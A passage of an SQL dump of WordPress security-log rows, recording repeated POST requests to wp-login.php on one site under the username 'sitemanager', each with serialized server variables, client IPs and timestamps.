00:00:00'),(94454,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36060\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745981918.2979259;s:12:\"REQUEST_TIME\";i:1745981918;}}','198.54.120.87',0,'2025-04-30 08:28:40','1970-01-01 00:00:00'),(94455,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49204\";s:11:\"REMOTE_ADDR\";s:13:\"41.77.119.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745982240.0738311;s:12:\"REQUEST_TIME\";i:1745982240;}}','41.77.119.186',0,'2025-04-30 08:34:01','1970-01-01 00:00:00'),(94456,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44538\";s:11:\"REMOTE_ADDR\";s:12:\"149.18.51.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745982563.6368639;s:12:\"REQUEST_TIME\";i:1745982563;}}','149.18.51.67',0,'2025-04-30 08:39:25','1970-01-01 00:00:00'),(94457,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42830\";s:11:\"REMOTE_ADDR\";s:12:\"114.55.74.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745982889.6115949;s:12:\"REQUEST_TIME\";i:1745982889;}}','114.55.74.90',0,'2025-04-30 08:44:51','1970-01-01 00:00:00'),(94458,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"25982\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745983209.786305;s:12:\"REQUEST_TIME\";i:1745983209;}}','192.34.56.148',0,'2025-04-30 08:50:11','1970-01-01 00:00:00'),(94459,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40310\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.209.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745983529.8329661;s:12:\"REQUEST_TIME\";i:1745983529;}}','54.36.209.164',0,'2025-04-30 08:55:31','1970-01-01 00:00:00'),(94460,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"12728\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745983848.8778169;s:12:\"REQUEST_TIME\";i:1745983848;}}','91.151.95.70',0,'2025-04-30 09:00:50','1970-01-01 00:00:00'),(94461,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34042\";s:11:\"REMOTE_ADDR\";s:12:\"163.61.72.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745984170.992224;s:12:\"REQUEST_TIME\";i:1745984170;}}','163.61.72.36',0,'2025-04-30 09:06:12','1970-01-01 00:00:00'),(94462,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56598\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745984496.4077129;s:12:\"REQUEST_TIME\";i:1745984496;}}','23.239.27.53',0,'2025-04-30 09:11:38','1970-01-01 00:00:00'),(94463,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35546\";s:11:\"REMOTE_ADDR\";s:15:\"198.186.130.214\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745984813.4987259;s:12:\"REQUEST_TIME\";i:1745984813;}}','198.186.130.214',0,'2025-04-30 09:16:55','1970-01-01 00:00:00'),(94464,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41534\";s:11:\"REMOTE_ADDR\";s:14:\"185.88.177.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-f